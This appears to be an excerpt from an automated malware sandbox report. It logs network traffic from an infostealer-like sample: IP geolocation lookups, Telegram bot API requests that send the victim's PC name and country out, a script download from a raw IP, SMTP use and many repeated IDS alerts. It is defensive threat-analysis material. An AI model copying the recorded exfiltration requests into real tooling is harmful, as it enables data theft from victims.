Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:39:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:09:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:39:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:20:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: checkip.dyndns.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49754 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49770 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49753 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49769 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49771 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49773 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49783 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49791 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49825 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49828 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49829 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49826 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49827 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49861 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49863 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49864 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49865 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49862 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49752 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49902 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49901 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49904 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49905 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49947 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49903 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49946 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49955 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49960 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49974 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49772 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49944 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49966 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49977 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49956 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49992 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49998 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49997 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49996 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49995 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50046 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50024 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50057 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50059 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50034 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50062 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50070 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50055 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49967 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50041 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49817 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49868 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49818 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49775 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49779 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49776 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49788 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49851 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49806 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49870 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49805 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49785 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49898 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49965 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49911 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49808 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49976 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49888 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49787 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49942 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49889 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49809 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50014 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49934 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49777 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50019 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49914 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49816 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49786 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49979 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49935 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50032 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49819 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50022 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49912 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49853 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49949 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49849 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50021 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49867 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49941 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49915 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49852 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50100 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49991 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49936 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50028 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50002 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49999 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50076 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50043 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50050 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50063 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49869 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49953 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49964 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50042 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49831 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49948 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49913 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49854 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49952 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49896 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50080 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50131 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50008 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49980 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50006 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49866 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50065 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50007 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50023 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50110 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50049 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50107 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50045 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50118 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50026 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50025 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49890 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49937 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49807 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49855 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50136 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49897 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50067 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50084 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50117 -> 188.114.96.3:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.4:49835 -> 142.250.110.109:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /zoom/aus1.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.215.11Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
